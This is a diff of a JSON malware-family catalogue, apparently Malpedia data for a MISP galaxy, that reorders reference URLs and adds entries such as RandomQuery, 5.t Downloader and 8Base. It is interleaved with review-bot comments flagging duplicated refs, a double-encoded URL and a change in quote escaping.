- "https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/",
 "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain",
+ "https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/",
 "https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html"
 ],
 "synonyms": [],
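Review bot: The added line in the py.pyaesloader hunk is byte-identical to the context line right after it, so the refs array now holds `https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader` twice; the py.unidentified_002 and py.unidentified_003 hunks below show the same duplication. This looks like the generator unconditionally prepending the Malpedia details URL without checking whether refs already starts with it, which would explain why only entries whose sole ref was that URL are affected. De-duplicating refs (order-preserving) before serialisation would fix all three; duplicates parse fine but bloat the galaxy and will trip any `uniqueItems` check on the array.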
@@ -11335,8 +11834,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch",
- "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
- "https://github.com/nathanlopez/Stitch"
+ "https://github.com/nathanlopez/Stitch",
+ "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/"
 ],
 "synonyms": [],
 "type": []
@@ -11348,6 +11847,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002",
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002"
 ],
 "synonyms": [],
@@ -11360,6 +11860,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003",
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003"
 ],
 "synonyms": [],
@@ -11386,8 +11887,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.venus_stealer",
- "https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/",
- "https://twitter.com/0xToxin/status/1625435116771180546"
+ "https://twitter.com/0xToxin/status/1625435116771180546",
+ "https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/"
 ],
 "synonyms": [],
 "type": []
@@ -11426,15 +11927,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon",
- "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
 "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf",
- "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf",
- "https://www.clearskysec.com/cryptocore-group/",
- "https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds",
+ "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md",
+ "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314",
 "https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf",
- "https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds",
+ "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/",
+ "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html",
+ "https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html",
+ "https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ",
+ "https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf",
+ "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf",
 "https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjCk7uOzMP-AhXOYMAKHYtLCKkQFnoECBIQAQ&url=https%3A%2F%2Fi.blackhat.com%2FUSA-22%2FThursday%2FUS-22-Wikoff-Talent-Need-Not-Apply.pdf&usg=AOvVaw0deqd7ozZyRTfSBOBmlbiG",
- "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314"
+ "https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/",
+ "https://www.clearskysec.com/cryptocore-group/"
 ],
 "synonyms": [
 "Cabbage RAT"
@@ -11449,8 +11956,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks",
- "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99",
- "https://persianov.net/windows-worms-forbix-worm-analysis"
+ "https://persianov.net/windows-worms-forbix-worm-analysis",
+ "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99"
 ],
 "synonyms": [
 "Forbix"
@@ -11506,8 +12013,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked",
 "https://attack.mitre.org/software/S0151/",
- "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
 ],
 "synonyms": [],
 "type": []
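Review bot: The new threatbook.cn ref in the vbs.cageychameleon hunk is double percent-encoded — `%2520` where a space should be `%20`, and `%25E2%2580%259C` / `%25E2%2580%259D` for the curly quotes — which is what a URL looks like after being encoded a second time, probably when it was copied out of a redirect or tracking link; as written it requests a path that literally contains `%20`, so it likely does not resolve. Decoding one level (`%2520` → `%20`, `%25E2%2580%259C` → `%E2%80%9C`) gives the intended path and is worth checking before merge. Less important, the retained google.com/url?… entry in the same array is a redirect wrapper whose `url=` parameter decodes to `https://i.blackhat.com/USA-22/Thursday/US-22-Wikoff-Talent-Need-Not-Apply.pdf`; the direct link would be the more durable reference.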
@@ -11549,15 +12056,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion",
- "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf",
 "https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years",
- "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader",
- "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/",
- "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/",
- "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/",
 "https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing",
- "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/",
- "https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html"
+ "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf",
+ "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/",
+ "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader",
+ "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/",
+ "https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html",
+ "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/",
+ "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/"
 ],
 "synonyms": [],
 "type": []
@@ -11604,6 +12111,19 @@
 "uuid": "93c87125-7150-4bc6-a0f9-b46ff8de1839",
 "value": "NodeJS Ransomware"
 },
+ {
+ "description": "According to SentinelLabs, this is a VisualBasic-based malware that gathers system and file information and exfiltrates the data using InternetExplorer.Application or Microsoft.XMLHTTP objects.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.randomquery",
+ "https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "76fd3fcb-151d-4880-b97e-ea890c337aad",
+ "value": "RandomQuery"
+ },
 {
 "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.",
 "meta": {
@@ -11623,14 +12143,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starwhale",
 "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
 "https://www.techrepublic.com/article/muddywater-targets-middle-eastern-and-asian-countries-in-phishing-attacks/",
+ "https://blog.talosintelligence.com/iranian-supergroup-muddywater/",
 "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
 "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
 "https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html",
- "https://blog.talosintelligence.com/iranian-supergroup-muddywater/",
 "https://www.govinfosecurity.com/iranian-apt-new-methods-to-target-turkey-arabian-peninsula-a-18706",
- "https://rootdaemon.com/2022/03/10/iranian-hackers-targeting-turkey-and-arabian-peninsula-in-new-malware-campaign/",
- "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html"
+ "https://rootdaemon.com/2022/03/10/iranian-hackers-targeting-turkey-and-arabian-peninsula-in-new-malware-campaign/"
 ],
 "synonyms": [
 "Canopy",
@@ -11672,8 +12192,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003",
- "https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/",
 "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
+ "https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/",
 "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt"
 ],
 "synonyms": [],
@@ -11700,8 +12220,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_005",
- "https://unit42.paloaltonetworks.com/trident-ursa/",
- "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/"
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
+ "https://unit42.paloaltonetworks.com/trident-ursa/"
 ],
 "synonyms": [],
 "type": []
@@ -11714,8 +12234,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_006",
- "https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations",
- "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/"
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
+ "https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations"
 ],
 "synonyms": [],
 "type": []
@@ -11780,28 +12300,28 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor",
- "https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised",
- "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
- "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/",
- "https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html",
- "https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html",
- "https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update",
- "https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md",
- "https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/",
- "https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social",
- "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
 "https://www.youtube.com/watch?v=fTX-vgSEfjk",
- "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/",
- "https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
+ "https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/",
 "https://blog.cyble.com/2023/03/31/a-comprehensive-analysis-of-the-3cx-attack",
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
 "https://www.rapid7.com/blog/post/2023/03/30/backdoored-3cxdesktopapp-installer-used-in-active-threat-campaign/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack",
 "https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack",
- "https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality",
+ "https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social",
+ "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/",
 "https://blogs.blackberry.com/en/2023/03/initial-implants-and-network-analysis-suggest-the-3cx-supply-chain-operation-goes-back-to-fall-2022",
+ "https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html",
+ "https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md",
+ "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/",
+ "https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised",
+ "https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update",
+ "https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack",
+ "https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023",
 "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
- "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
+ "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
+ "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
+ "https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html",
+ "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/"
 ],
 "synonyms": [
 "SUDDENICON"
@@ -11812,31 +12332,31 @@
 "value": "3CX Backdoor (Windows)"
 },
 {
- "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
+ "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim\u2019s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger",
- "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102",
- "https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html",
 "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
+ "https://www.youtube.com/watch?v=vzyJp2w8bPE",
+ "https://habr.com/ru/company/group-ib/blog/477198/",
+ "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://twitter.com/James_inthe_box/status/1401921257109561353",
+ "https://cert.gov.ua/article/955924",
+ "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware",
+ "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/",
+ "https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102",
+ "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89",
+ "https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html",
 "https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware",
 "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
 "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
- "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89",
- "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware",
- "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/",
- "https://twitter.com/James_inthe_box/status/1401921257109561353",
- "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/",
- "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/",
- "https://cert.gov.ua/article/955924",
- "https://blog.netlab.360.com/purecrypter",
- "https://habr.com/ru/company/group-ib/blog/477198/",
- "https://www.youtube.com/watch?v=vzyJp2w8bPE"
+ "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/"
 ],
 "synonyms": [
 "404KeyLogger",
@@ -11852,9 +12372,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat",
- "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
 "https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf",
- "https://attack.mitre.org/groups/G0024"
+ "https://attack.mitre.org/groups/G0024",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html"
 ],
 "synonyms": [],
 "type": []
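Review bot: The only content change in the Snake Keylogger description line is `’` becoming `\u2019`, which decodes to the same string, so this hunk (and the Adam Locker description in the `@@ -12109` hunk, plus the `\u201c`/`\u201d` in the newly added 8Base entry) reads as the serializer switching to ASCII-only output — presumably an `ensure_ascii`-style setting, though the generator is not in view. That is harmless to consumers, but it makes every description containing a curly quote show up as modified and will do so again if the setting toggles between runs. Worth pinning the escaping policy in the generator and stating it in the commit message, e.g. `chg: [malpedia] regenerate; descriptions now ASCII-escaped`, so later readers do not hunt for a semantic edit in these lines.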
@@ -11862,6 +12382,20 @@
 "uuid": "823f4eb9-ad37-4fab-8e69-3bdae47a0028",
 "value": "4h_rat"
 },
+ {
+ "description": "Downloader used in suspected APT attack against Vietnam.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader",
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/",
+ "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "685c9c30-aa9f-43ee-a262-43c17c350049",
+ "value": "5.t Downloader"
+ },
 {
 "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"",
 "meta": {
@@ -11876,36 +12410,56 @@
 "uuid": "ac2608e9-7851-409f-b842-e265b877a53c",
 "value": "7ev3n"
 },
+ {
+ "description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with \u201cname-and-shame\u201d techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base",
+ "https://krebsonsecurity.com/2023/09/whos-behind-the-8base-ransomware-website/",
+ "https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/",
+ "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html",
+ "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/",
+ "https://twitter.com/rivitna2/status/1674718854549831681",
+ "https://socradar.io/dark-web-profile-8base-ransomware/",
+ "https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/",
+ "https://blog.bushidotoken.net/2023/05/unmasking-ransomware-using-stylometric.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7ee60640-29cd-4127-b805-1f2b753e9e15",
+ "value": "8Base"
+ },
 {
 "description": "8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim's machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper",
- "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
- "https://community.riskiq.com/article/5fe2da7f",
- "https://blog.malwarelab.pl/posts/on_the_royal_road/",
 "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf",
+ "https://community.riskiq.com/article/5fe2da7f",
+ "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/",
+ "https://blog.malwarelab.pl/posts/on_the_royal_road/",
+ "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
+ "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage",
+ "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
 "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f",
 "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
- "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf",
- "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
- "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf",
- "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/",
+ "https://community.riskiq.com/article/56fa1b2f",
 "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage",
- "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?",
- "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
- "https://community.riskiq.com/article/56fa1b2f"
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/"
 ],
 "synonyms": [
 "8t_dropper",
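Review bot: The rebuilt refs list for 8T_Dropper still carries the Check Point Vicious Panda write-up twice, as `https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign` and again with a trailing slash; both forms were already present on the old side, so the reorder preserved the duplicate rather than collapsing it. The same thing happens in the 3CX Backdoor hunk above (whose start is outside this view), where the Symantec `3cx-supply-chain-attack` URL survives as a context line and is also added a second time, leaving two byte-identical entries. If the generator dedups refs, it should compare exact strings and also normalise a trailing `/` before emitting, otherwise these lists will keep accumulating near-duplicates on every regeneration.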
@@ -11921,24 +12475,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
- "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.infopoint-security.de/medien/the-elderwood-project.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
+ "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
+ "https://www.infopoint-security.de/medien/the-elderwood-project.pdf",
